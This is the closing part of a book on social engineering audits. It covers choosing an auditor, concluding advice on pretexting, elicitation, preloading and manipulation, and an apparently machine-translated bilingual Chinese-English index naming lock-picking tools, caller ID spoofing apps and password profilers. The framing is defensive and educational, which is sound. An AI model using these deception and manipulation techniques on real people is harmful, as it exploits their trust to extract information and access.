  • Contract: Having the audit completely outlined, documented, and limitations set can go a long way toward a successful audit. Personally, I do not like to work with a ton of limitations because most malicious social engineers do not have any at all. But at least a small subset of rules written out on what is and is not allowed should be agreed upon.

A social engineer wants permission to record phone calls; video-record the building and interactions; and especially if an audit includes physical security, to have written permission to remove items from the premises. An auditor doesn’t want to finish the audit just to be presented with a warrant or a lawsuit.

Also designate an emergency contact person who knows about the audit and can vouch for the auditor and team. If an auditor finds himself in a legal jam he’ll want a number to call. No one wants to be performing a late-night dumpster dive to be met by the police and have to sit the night in jail. Having a contact person provides a “get out of jail free” card and can save a lot of hassle in the long run.

  • Rapport: Apply the principles in this book to find a good auditor. When you speak with him on the phone or in person how does he make you feel? What do you see? Do you get the sense he is very professional and his goal is to really help you?

Does the team portray itself and its business as one you want to be associated with? If you are the project manager who is hiring an auditor, a load of responsibility rests with you. The auditor may not want to meet with a team. The fewer people who know what the SE team looks like, the better for physical security audits. The team, as a result, may only want to meet with one or two people. This means you must ensure the auditor is high quality and can do the work needed.

  • Time: One of the biggest mistakes companies make when seeking auditors to help them is not giving them enough time to perform the job. They figure that a few phone calls or one site visit can all be accomplished in one day. Although that may be true, what about information gathering, planning, and scoping out the targets? These things take time. Time is important but it is also a double-edged sword—allow enough time for the auditor to do a good job, but not so much time that it becomes a cost problem. Manage, but do not micro-manage.

These are just a few of the areas to consider when choosing the right auditor for your company. In the end you must feel comfortable and good that the social engineering team will have your best interests at heart, will do their best to remain professional, and stay within the guidelines.

Concluding Remarks

Knowledge is of no value unless you put it into practice.

—Anton Chekhov

The information that I provide in this book is not light-hearted. Much of the information shows serious vulnerabilities in the way people think and act. When I teach security classes with my mentor, Mati, he talks about a payload encoder called “shikata ga nai,” which is Japanese for “it cannot be helped” or roughly translated, “there is no hope.”

I thought about making that the epigraph, but I thought the phrase “there is no hope” is a little more fatalistic than I like to be normally. Instead, I feel the thought about practice and knowledge fits more of the theme of the book. I have stated time and again that perfecting the skills as well as the ability to detect these skills in use takes a lot more than just knowledge. Being too afraid about the things I have mentioned in this book leads to anger at all the ways people get hacked, which only leads down a path that will cause us to close our minds. Instead I suggest a different approach to the information in this book besides fear: A new mindset that encourages you to learn and think and understand the methods the “bad guys” use so you can be protected from falling prey to them.

Now I am not saying that there is no place for fear. There definitely is room to feel some healthy fear. Protecting your data, your personal information, and your identity, but at the same time understanding the “hacker” mindset combined with the information in this book, might be more beneficial to you.

This section touches on a few things I hope you can take away from this book and use in your life, especially if you are in charge of security for your company or your clients, or are reading this for your own personal security.

Social Engineering Isn’t Always Negative

I hope that I impressed upon you that social engineering is not always negative. It is not always the hackers or the con men who use social engineering tactics. Doctors, therapists, social workers, parents, children, bosses, employees—everyone uses social engineering tactics to some extent. The art of persuasion is used often in normal everyday social situations.

Learning that social engineering isn’t always scary, dark, and evil can go a long way toward uncovering how certain skills are used. After you understand those skills, practice and become skilled or proficient in them; discerning how they are being used against people then becomes much easier.

You can find places to analyze these skills that are not in the dark corners of the world. You can read books on psychology, persuasion, and sales, then observe in the field to see how these skills are used.

The Importance of Gathering and Organizing Information

I cannot really reiterate enough how important quality information gathering truly is. The quality, professionalism, and the very success of every social engineering engagement depends on the level of information gathering you do. The Web is a boundless and endless resource of information. Companies post their financial records, employees’ names and titles, contact information, pictures of physical locations, security policies, contracts, vendors’ and suppliers’ names, people’s personal files, and so much more. On a personal level, employees as well as everyday people post personal pictures, their addresses, their purchases, leases, contracts, favorite foods, teams, music, and so on.

Armed with all this overwhelming amount of information a social engineer can pick and choose what he wants to use and what kind of attack vector to implement. As the engagement continues the information gathered will give the social engineer the ability to use story lines and pretexts that will have the greatest effect on the target. Without information gathering, as reiterated throughout the book, the engagement will most likely lead to failure.

For example, if a professional auditor is given three weeks for a job, he should spend half of that time gathering information. However, professional auditors often have a tendency to get excited and approach the target with the old standby pretexts. Do not fall into this habit; spend a lot of time in information gathering.

Almost as important as the information gathering itself is how you store and catalogue the information—perhaps by using one of the methods mentioned in Chapter 2 to store and organize this information. Learning to not just efficiently collect the information but how to store the information can go a long way toward making it efficient to use. Not simply dumping things into a massive document but categorizing things, cataloging them, and labeling them will make the information easy to use, especially if you are on a phone engagement.

Just remember that a social engineer is only as good as the information he obtains. I personally have seen too many gigs go down the drain because of bad information or lack of information. At the same time I have seen people who might not be the smoothest speakers or the most charming succeed in very difficult situations because of the information they gathered.

Information is the crux of social engineering, and if you take anything away from this book, let it be that.

Choose Your Words Carefully

Just like this section’s opening epigraph, this topic lends itself to the thought that information has no value unless you put it into practice. You can have all the information gathered and organized and catalogued, but you need to use it efficiently. The first step in this is to organize what words you will use.

I discussed the skills of elicitation and preloading. These are two of the most valuable skills, and I hope you practice using them. Use anchors, keywords, and phrases to load the target with emotions and thoughts to make him follow your lead. Preloading is a very powerful technique that cannot be mastered in a short while, but practice will enable you to use this skill. The great thing about preloading is that you can practice this skill at home, at work, with your kids, your parents, your clients, really anywhere.

Don’t think that practicing this means you will always have to get people to do things against their will. Preloading is used to motivate people’s minds to be more open to a suggestion or idea. You don’t have to use it maliciously. Kids do it all the time. For example, your daughter says, “Daddy, I love you…” and adds a few seconds later, “Can I have that new doll?” This is an example of preloading, putting a “target” into an agreeable emotional state.

Once you master that skill, or at least become proficient in using it, work on the way you use elicitation. Remember that no one loves the feeling of being interrogated. Elicitation should not mimic a police interrogation; it should be a smooth, seamless conversation that is used to gather intelligence on the target or topic you are seeking.

Learning the methods and process used to come up with questions that can be used in normal conversation will not only enhance your skills as a social engineer but also as a communicator. People enjoy when they feel others are interested in their lives and their work. Using this skill for the good can enhance your ability as a social engineer.

I have a good friend who gets people to tell her anything. It is uncanny. Complete strangers will, at the end of a conversation, say things like, “I just don’t know why I am telling you all these things...” She is not a social engineer or even in security, but she is a great elicitor.

Mastering preloading and elicitation can enhance your ability to also plan out what you will say. These skills can put your mind in the frame of seeking and gathering information in a more intelligent and less intrusive way.

Have a Good Pretext

Remember that a good pretext is not a lie or a story. Instead you become and live your pretext for a short time. Every fiber of your being—your thoughts, actions, speech, and motivation—should reflect what the pretext would do. If you can accomplish this then your pretext will be believable to the target.

The other thing to remember is that pretexting is used in everyday life, not just in social engineering. Imagine this scenario: You just had an argument with your mate. Now it is time for work. You don’t want everyone to know that things at home aren’t that good this day, so when you go to work and meet your coworkers who say, “Hey Jim, how’s it going?” your reply is, “Awesome. Couldn’t be better.”

That is the opposite of the truth, but what do you do to make that believable? Shoot someone a smile, or project confidence via your posture or body language. Depending on how private you are and how much you don’t want to share with your co-workers you might even have a “cover story” to prove how great life is.

This is just one scenario, but people use pretexting all the time. Whenever you are trying to portray to people something different from reality, the “cover story” you use to make it believable is a pretext. Of course, most people aren’t really good at it and are easily detected, but noticing these situations in your life and work will give you a good basis of pretexting to analyze.

Analyzing these scenarios can help you identify areas you want to improve in your pretexts and help you master this very useful skill.

Practice Reading Expressions

I think I can talk for weeks about microexpressions. The topic just fascinates me, and it intrigues me to think that people have built-in mechanisms for displaying our deepest darkest feelings, and most of us will have no control over it. How our emotions cause certain muscles to contract and display a certain expression for milliseconds is just an amazing aspect of creation. But learning how to notice them, read them, and use those very same expressions to manipulate others is something that truly astounds me.

Practice how to recreate the microexpressions discussed in Chapter 5. As you do, notice the emotions the microexpressions conjure up in you. Practicing these expressions will also help you read them when others express them.

As you practice, do not focus just on what it takes to read microexpressions in others but on how to control your own microexpressions and prevent someone using their facial-reading skills on you. Remember that reading others is a good skill, but having control over your own microexpressions, body language, and vocal tones is far better. This skill can enhance your security practice as well as your personal relationships. After you master many of those skills, you will begin to see how you can utilize one of the main concepts in Chapter 5, the human buffer overflow (HBO). The human mind works much like software, just on a higher level. But it can be fuzzed, examined, and overthrown like software. Re-read that section to make sure you fully understand the principles presented.

Manipulation and Influence

Manipulation and influence are two aspects of social interaction that have some dramatic and powerful effects on the people you interact with. For that reason, use the information in Chapter 6 with extreme care. Learning how to persuade and manipulate people can literally make the difference between success and failure in a social engineering endeavor. Every day, people try to manipulate and persuade others to take actions. Some of these actions are very bad and can cost money, personal freedom, and identities.

Use those situations as teaching tools. Analyze the methods that marketers, psychologists, counselors, teachers, and even coworkers use to try to manipulate you. Pick out points that you think you can learn from and put them into your arsenal.

Remember that persuasion is not always negative: It doesn’t always have to mean getting someone to do something they don’t want. Persuasion can have very positive effects, and many times, positive persuasion is much more difficult. If you can master those skills and use them to help people stay secure, you will be more readily able to identify when someone is using persuasion tactics in a negative sense.

Be Alert to Malicious Tactics

Being aware of what tactics attackers use will surely keep you from falling victim to them. Professional auditors can use these tactics to educate their customers on what to look for in a possible attack. Be alert to pick out instances of how these are being used.

For example, one tactic the “bad guys” use is to strike during times of trouble. When the planes hit the Twin Towers, the earthquakes hit Haiti, and the tsunami hit Asia, the devastation upon the human population and their lives, psyche, and emotions was insurmountable. During times of people’s vulnerability and weakness is exactly when the bad guys strike.

 

Let me illustrate it this way: I once read an article about how lions hunt in the wild. It said that a lion, when it wants to confuse and scatter a group of prey in order to choose a victim, will roar toward the ground, not toward the prey or the sky, but at the ground. Why? Because the massive, fear-inspiring roar reverberates off the ground and surrounds the prey. The animals become confused, not knowing which direction the lion is coming from. Some scatter left, some scatter right, and in doing so they leave the young, the old, the infirm, and the immature members of the herd exposed.

 

This is not far from how professional malicious social engineers operate. They “roar” in a way that causes or adds to the confusion: they use websites that offer to help find missing loved ones after a natural disaster, or claim to have lost family and friends in the carnage themselves. The attack comes when the targets’ emotions are running so high that they cannot see straight.

 

The inexperienced and the technologically immature fall victim first, giving out small pieces of information until the attacker has enough to build a profile. That profile is then used to launch further attacks, each more vicious and heartless than the last.

 

Stay alert to these patterns and you will help keep your clients and yourself from falling victim to them. Treat each such situation as a lesson: analyze the methods used and note whether they worked or failed. Doing so sharpens your ability to spot potential threats.

 

The unfortunate difference between a lion and a social engineer (besides the obvious) is that a social engineer gives no audible roar. He is not out there yelling, “I want prey, now run!” Instead, malicious social engineers’ sly, subtle attacks trick thousands of people into their traps each year.

 

Use Your Fear

 

If this chapter has built any kind of fear in you, all I can say is “good.” You need it. Healthy fear can save your life, or at least, in this case, your identity and your business.

 

Use that fear to motivate change. Don’t get angry and upset. Decide to change, and to educate yourself, your family, and your company on how to observe, notice, and defend against these attacks. Decide that you will not allow your identity and your company to be hacked, and then do something about it.

 

This whole book boils down to “security through education.” Human hacking is an art form. Social engineering is a blend of science, art, and skill. When these are combined in the right proportions, the result is “shikata ga nai” (Japanese for “it cannot be helped”).

 

Companies lose millions of dollars per year to breaches, a large majority of which stem from social engineering attacks. Yet, more often than not, when we offer clients the chance to add a social engineering audit to their pentesting engagement, they decline.

 

Why?

 

Companies tend to fear change. Countless times in my professional practice I have heard intelligent and successful business owners say things like, “We don’t need a social engineering audit. Our people won’t fall for those tricks.” Then, during the pentest, we make a few authorized phone calls to gather information, and when we present that information in the report they are amazed at how easy it was to obtain.

 

At all levels of the companies we work with, security awareness doesn’t tend to change much. When we spoke to companies after a pentest about a security awareness training program we had launched, many told us they do not perform formal, intensive training for their call center or tech support departments. Yet those are the same departments that most often fall for social engineering attacks.

 

This points to the core of the problem I am describing here. Security through education cannot be a simple catchphrase; it has to become a mission statement. Until companies, and the people who make up those companies, take security personally and seriously, this problem won’t be fixed completely. In the meantime, those who were serious enough to read this book and to peer into the dark corners of society can enhance their skills enough to keep their families, themselves, and their companies a little more secure.

 

When the “lion roars,” be the one at the front of the pack leading the others out of harm’s way. Be an example of what to do and how to defend against these attacks.

 

With enough time and enough effort, anyone can be social engineered. Those words are true, as scary as they are. That doesn’t mean there is no hope; it means your job is to make malicious social engineering so difficult and time-consuming that most attackers will give up and go after the “low-hanging fruit,” the prey that is left behind. I know; it sounds cold. I would love it if everyone read this book and made some massive changes. Then companies would be truly secure. But that is just not the world we live in.

 

That statement raises a very serious question. If no one is immune, how can companies, individuals, families, and everyone else protect against this massive vulnerability? Until companies begin to recognize their exposure to social engineering attacks, individuals will have to educate themselves about attack methods, stay vigilant, and spread the word to others. Only then do we have hope of staying, if not one step ahead of an attack, then not too far behind.

 

Summary

 

As I conclude this book, I hope it has opened your eyes to the world of social engineering. I hope that it will continue to help you take note of the potential for malicious attacks. I hope it has helped you build or maintain a healthy fear of the potential for disaster.

 

I also hope this book helps you to protect your business, your family, your children, your investments, and your life. I hope that the information within has shown you that staying secure and protected is not impossible.

 

Mati Aharoni, my mentor, says in one of his classes that the reason the bad guys usually win is that they have dedication, time, and motivation on their side. Don’t let life get in the way of security. Conversely, don’t let too much fear of the bad guys keep you from enjoying life.

 

I hope that applying the principles in this book enhances your ability to read and communicate more effectively with people around you. Using them in many aspects of your life, not just security, can prove to be a life-altering exercise. Social engineering is truly an art form. Enjoy.

 


销售量

sales

相似

similarity

小费 罐 盐

tip jar salting

不确定

uncertainty

周围环境

surroundings

 

制药公司和互惠

pharmaceutical companies and reciprocation

 

网络钓鱼

phishing

 

电子邮件

email

 

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

 

电话使用

phone use

 

照片、智能手机、GPS 定位

photographs, smart phones, GPS location

 

外表的吸引力

physical attractiveness

 

物理工具

physical tools

 

相机

cameras

 

撬锁工具

lock picks

 

撞击键

bump keys

防撞 BiLock

Bump Proof BiLock

电子锁

electronic locks

套件

kits

磁力锁

magnetic locks

挂锁垫片

padlock shims

推刀

shove knives

录音设备

recording devices

 

的原因

reasons for

撬锁

picking locks

 

撞击键

bump keys

 

电子锁

electronic locks

 

磁力锁

magnetic locks

 

挂锁垫片

padlock shims

 

实践

practice

 

raking

 

推刀

shove knives

 

NLP星球

Planet NLP

 

规划图

planogram

 

种植理念。请参阅预加载

planting ideas. See preloading

 

政客和回报

politicians and recriprocation

 

政治、框架和

politics, framing and

 

端口扫描

port scans

 

欧洲法律

European laws

 

米兹拉希,阿维

Mizrahi, Avi

 

莫尔顿·斯科特

Moulton, Scott

 

积极对抗

positive confrontation

 

积极操纵

positive manipulation

 

正强化

positive reinforcement

 

目标无力

powerlessness of target

 

实践

practice

 

方言

dialects

 

表达式

expressions

 

预加载

preloading

 

电影和

movies and

 

牛排晚餐

steak dinner

 

前提

presupposition

 

借口

pretexting

 

名人死亡

celebrity death

 

结论

conclusion

 

定义

definition

 

描述

description

 

方言

dialects

 

例子

examples

 

惠普

Hewlett-Packard

里夫金,斯坦利·马克

Rifkin, Stanley Mark

表达式

expressions

 

跟进

follow-through

 

联邦贸易委员会和

FTC and

 

信息收集和

information gathering and

 

互联网和

Internet and

 

法律问题

legal issues

 

生活用途

life uses

 

个人兴趣

personal interests

 

电话使用

phone use

 

皮特、布拉德

Pitt, Brad

 

灾后诈骗

post-disaster scams

 

原则

principles of

 

电台主持人和

radio hosts and

 

研究和

research and

 

简单

simplicity

 

自发性

spontenaity

 

目标、附件

targets, attachments

 

技术支持人员

tech support guy

 

工具

tools

 

预防

prevention

 

审计和

audits and

 

审计师选择

auditor selection

目标设定

goal setting

包含物品

included items

个人安全意识文化

personal security awareness culture

 

脚本

scripts

 

软件更新维护

software update maintenance

 

脚步

steps

 

物品陈设

product placement

 

分析软件

profiling software

 

密码分析器

password profilers

 

CUPP(通用用户密码分析器)

CUPP (Common User Passwords Profiler)

WYD(谁是你爸爸)

WYD (Who’s Your Daddy)

进步环保运动

Progressive Environmentalist Movement

 

代词用法

pronoun use

 

聆听证明

proof of listening

 

道具、借口

props, pretexting

 

心理需求

psychological needs

 

心理学家

psychologists

 

公开报告

public reports

 

公共服务器

public servers

 

马泰尔戈

Matelgo

 

紫色色彩联想

purple color association

 

Q

 

问题

questions

 

假定

assumptive

 

封闭式

closed-ended

 

领导

leading

 

开放式

open-ended

 

金字塔方法

pyramid approach

 

引号、嵌入命令和

quotes, embedded commands and

 

R

R

 

撬锁用的耙子

rakes for lock picking

 

耙锁

raking locks

 

关系

rapport

 

积极倾听、反思回应

active listening, reflective responding

 

银行出纳员

bank tellers

 

建筑

building

 

对人的影响

affect on people

外观和

appearance and

肢体语言匹配

body language matching

呼吸率

breathing rate

关键短语

key phrases

善良和

kindness and

喜欢人

liking people

聆听

listening

语音模式匹配

speech pattern matching

语音音调匹配

vocal tone matching

好奇心和

curiosity and

 

定义

definition

 

同情和

empathy and

 

基本知识

general knowledge

 

重要性

importance

 

影响和

influence and

 

满足人们的需求

meeting people’s needs

 

谈论自我

talking about self

 

测试

testing

 

拉苏尔·伊姆兰

Rasul, Imran

 

真人秀节目,框架和

reality TV shows, framing and

 

互惠

reciprocation

 

要求你想要的东西

ask for what you want

 

优惠和

concessions and

 

文化差异和

cultural differences and

 

赠送某物

giving away something

 

阿尔文·古尔德纳

Gouldner, Alvin

 

恩情

indebted feelings

 

影响和

influence and

 

录音设备

recording devices

 

蜂窝卡

cellular card

 

的原因

reasons for

 

红色联想

red color association

 

反思性回应

reflective responding

 

加强

reinforcement

 

关系、框架和

relationships, framing and

 

汽车租赁

rental car

 

报告、公开报告

reports, public reports

 

研究、借口和

research, pretexting and

 

响应时间、询问和

response time, interrogation and

 

里夫金,斯坦利·马克

Rifkin, Stanley Mark

 

撕毁汽车里的支票

ripped up check in car

 

ROI(投资回报率)、黑客和

ROI (return on investment), hackers and

 

路由器,正在搜索

routers, searching for

 

沟通规则

rules for communication

 

拉什,乔纳森 J.

Rusch, Jonathan J.

 

年代

S

 

悲伤

sadness

 

销售、社会认同和

sales, social proof and

 

销售人员

salespeople

 

社会工程师镜像

social engineers mirroring

 

往小费罐里加盐

salting the tip jar

 

萨金特,威廉,《心灵之战》

Sargant, William, Battle for the Mind

 

强化满足

satiation of reinforcement

 

诈骗者

scam artists

 

稀缺原则

scarcity principle

 

经济学

economics

 

故意短缺

intentional short supply

 

肉贩子

meat salesman

 

餐厅

restaurants

 

社会事件

social events

 

紧迫性

urgency

 

脚本

scripts

 

预防和缓解

prevention and mitigation

 

SE(社会工程学)

SE (Social Engineering)

 

定义

definition

 

概述

overview

 

稀缺性和

scarcity and

 

用途

uses

 

搜索引擎

search engines

 

谷歌

Google

 

初段

Shodan

 

安全

security

 

黑客同事

hackers versus co-workers

 

软件补丁

patches for software

 

个人安全意识文化

personal security awareness culture

 

严肃

seriousness

 

通过教育实现安全

security through education

 

自信,情境

self-confidence, situational

 

感官

senses

 

思维方式

modes of thinking

 

亚模态

sub-modalities

 

感觉敏锐度

sensory acuity

 

句子结构、NLP 和

sentence structure, NLP and

 

服务器

servers

 

托管

hosting

 

民众

public

 

寻找

searching for

 

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

 

克劳德·香农

Shannon, Claude

 

香农-韦弗模型

Shannon-Weaver model

 

基础

basis

 

问题

problems for

 

Shodan 搜索引擎

Shodan search engine

 

购物者,操纵

shoppers, manipulation

 

音乐循环

music loops

 

产品短缺

short supply of product

 

撬锁用推刀

shove knives for lock picking

 

碎纸

shredded documents

 

相似性、社会认同和

similarity, social proof and

 

借口简单

simplicity in pretexting

 

技能,根深蒂固

skills, ingraining

 

肤色、审讯和

skin color, interrogation and

 

斯基特卡,琳达

Skitka, Linda

 

马尔科姆·斯莱尼

Slaney, Malcolm

 

聪明的杰米

Smart, Jamie

 

“地图不是领土。”

“The map is not the territory.”

 

智能手机、图片、GPS 定位

smart phones, pictures, GPS location

 

SMCR(发送者-消息-通道-接收者)模型

SMCR (Sender-Message-Channel-Receiver) model

 

微笑

smiles

 

杜兴·德·布洛涅

de Boulogne, Duchenne

 

true versus fake

 

斯诺,大卫

Snow, David

 

框架放大

frame amplification

 

社会,定义

social, definition

 

社交焦虑症运动

social anxiety disorder campaign

 

社会权威

social authority

 

社会工程框架

social engineering framework

 

社会工程师

social engineers

 

沟通和

communication and

 

心怀不满的员工

disgruntled employees

 

医生

doctors

 

高管招聘人员

executive recruiters

 

政府

governments

 

黑客

hackers

 

身份窃贼

identity thieves

 

律师

lawyers

 

微表情和

microexpressions and

 

NLP 使用

NLP use

 

渗透测试人员

penetration testers

 

心理学家

psychologists

 

销售人员

salespeople

 

诈骗者

scam artists

 

间谍

spies

 

思考

thinking like

 

类型

types

 

社会激励

social incentives

 

社交网络

social networks

 

尾随

tail-gaiting

 

社会交往规则

social interaction rules

 

社交媒体

social media

 

哔哔

Blippy

 

信息收集

information gathering

 

社交媒体渠道、工作信息

social media outlets, job information

 

社会证明

social proof

 

偷拍相机

Candid Camera

 

明星代言产品

celebrity endorsement of product

 

西奥迪尼,罗伯特

Cialdini, Robert

 

笑声

laugh tracks

 

疼痛耐受力

pain tolerance

 

销售和

sales and

 

相似性和

similarity and

 

小费 罐 盐

tip jar salting

 

不确定性和

uncertainty and

 

社会保障管理局黑客攻击(米特尼克)

Social Security Administration hack (Mitnick)

 

社会安全号码

Social Security Number

 

背景检查员和

background checkers and

 

非法使用

illegal use

 

软件

software

 

分析软件

profiling software

 

马尔特戈

Maltego

密码分析器

password profilers

互联网搜索

searching Internet for

 

安全补丁

security patches

 

更新维护

update maintenance

 

语音模式匹配

speech pattern matching

 

间谍

spies

 

恶搞应用

SpoofApp

 

恶搞卡

SpoofCard

 

欺骗

spoofing

 

来电显示

Caller ID

 

来电显示

caller ID

 

SpyHawk SuperTrak GPS 全球超级轨迹棒 USB 数据记录器

SpyHawk SuperTrak GPS Worldwide Super Trackstick USB Data Logger

 

读取数据

reading data

 

集邮

stamp collection

 

尖塔状手指

steepled fingers

 

史蒂文斯,汤姆·G.,自信

Stevens, Tom G., self-confidence

 

坚忍的眼神

stoic eyes

 

故事作为直接指导

stories as direct instructions

 

潜意识框架

subliminal framing

 

目标的暗示性

suggestibility of target

 

增加

increasing

 

笔点击

pen clicks

 

惊喜

surprise

 

恐惧和

fear and

 

权威的象征

symbols of authority

 

以同情的态度进行审讯

sympathetic approach to interrogation

 

电视

T

 

尾随

tail-gating

 

敲击/敲击手指

tapping/drumming fingers

 

目标

targets

 

注意,保持

attention, holding

 

基线

baseline

 

行为和你的情绪

behavior and your emotion

 

情感依恋

emotional attachments

 

环境,控制

environment, controlling

 

恐吓

intimidation

 

个人依恋

personal attachments

 

无能为力

powerlessness

 

受暗示性增加

suggestibility, increasing

 

破坏信仰

undermining beliefs

 

技术支持,借口

tech support, pretexting

 

Teensy HID 攻击向量

Teensy HID attack vector

 

电话使用

telelphone use

 

基于电话的工具

telephone-based tools

 

星号

Asterisk

 

来电显示欺骗

Caller ID spoofing

 

脚本

scripts

 

恶搞应用

SpoofApp

 

恶搞卡

SpoofCard

 

2006 年电话记录和隐私保护法案

Telephone Records and Privacy Protection Act of 2006

 

时态转换

tense switches

 

撬锁用扭力扳手

tension wrenches for lock picking

 

欺骗的艺术(米特尼克)

The Art of Deception (Mitnick)

 

人类与动物的情感表达(达尔文)

The Expression of the Emotions in Man and Animals (Darwin)

 

真正的喧嚣

The Real Hustle

 

盗窃、员工盗窃

theft, employee theft

 

主题开发

theme development

 

主题公园丑闻

Theme Park Scandal

 

欣欣向荣的办公室

Thriving Office

 

小费 罐 盐

tip jar salting

 

汤姆金斯,西尔万

Tomkins, Silvan

 

工具

tools

 

GPS追踪器

GPS Tracker

 

在线的

online

 

马尔特戈

Maltego

SET(社会工程师工具包)

SET (Social Engineer Toolkit)

密码分析器

password profilers

 

身体的

physical

 

相机

cameras

撬锁工具

lock picks

录音设备

recording devices

实践

practice

 

借口

pretexting

 

电话

telephone-based

 

星号

Asterisk

来电显示欺骗

Caller ID spoofing

脚本

scripts

恶搞应用

SpoofApp

恶搞卡

SpoofCard

绝密 1 案例研究

Top Secret 1 case study

 

绝密 2 案例研究

Top Secret 2 case study

 

酷刑、陷害和

torture, framing and

 

Tostitos 徽标

Tostitos logo

 

通过动觉思考者触摸物体

touching objects by kinesthetic thinkers

 

触摸自己

touching self

 

通信交易模型,巴尔蒙德,华盛顿特区

transactional model of communications, Balmund, D.C.

 

垃圾

trash

 

翻找垃圾箱的指南

dumpster diving pointers

 

碎纸

shredded documents

 

有价值的东西

valuable things

 

特百惠派对

Tupperware parties

 

一路向下的乌龟(DeLozier 和 Grinder)

Turtles All the Way Down (DeLozier and Grinder)

 

电视真人秀、框架和

TV reality shows, framing and

 

U

 

终极语音、NLP 和

Ultimate Voice, NLP and

 

不确定性、社会认同和

uncertainty, social proof and

 

破坏信仰

undermining beliefs

 

揭开面纱(埃克曼)

Unmasking the Face (Ekman)

 

更新软件

updating software

 

USB 驱动器接受、通信和

USB drive acceptance, communication and

 

用户站点

user sites

 

V

 

有价值的东西被扔掉

valuable things thrown away

 

信息的价值

value of information

 

动词时态

verb tense

 

口头交流

verbal communication

 

视觉框架

visual framing

 

视觉思考者

visual thinkers

 

亚模态

sub-modalities

 

语音音调匹配

vocal tone matching

 

嗓音

voice

 

审讯和

interrogation and

 

NLP 和

NLP and

 

Vontu,电子邮件中的机密数据

Vontu, confidential data in email

 

西

W

 

温暖线索

warm leads

 

Weaver, Warren。另请参阅Shannon-Weaver 模型

Weaver, Warren. See also Shannon-Weaver model

 

网络攻击媒介,SET(社会工程师工具包)

web attack vector, SET (Social Engineer Toolkit)

 

网站

websites

 

背景检查员

background checkers

 

ICanStalkU网站

ICanStalkU.com

 

信息收集

information collection

 

撬锁

lock picking

 

microsoft.com,PDF 文件

microsoft.com, PDF files

 

个人网站

personal websites

 

公开报告

public reports

 

公共服务器

public servers

 

搜索引擎

search engines

 

社会工程师

social-engineer.org

 

社交媒体

social media

 

用户站点

user sites

 

将不在场证明方法引入审讯

wedging the alibi approach to interrogation

 

克里斯·韦斯特伯里

Westbury, Chris

 

白色联想

white color association

 

谁是

Whois

 

温斯顿·乔尔

Winston, Joel

 

玛格丽特·威戈特

Withgott, Margaret

 

巫师计划

Wizards Project

 

黄凯薇

Wong, Kelvie

 

言语、质问和

words, interrogation and

 

职场朋友

workplace friends

 

WYD(谁是你爸爸)分析软件

WYD (Who’s Your Daddy) profiling software

 

Y

 

黄色联想

yellow color association

 

Z

 

辛巴格(Zinbarg),理查德 E.

Zinbarg, Richard E.

 

微笑时颧大肌

zygomaticus major muscle in smiling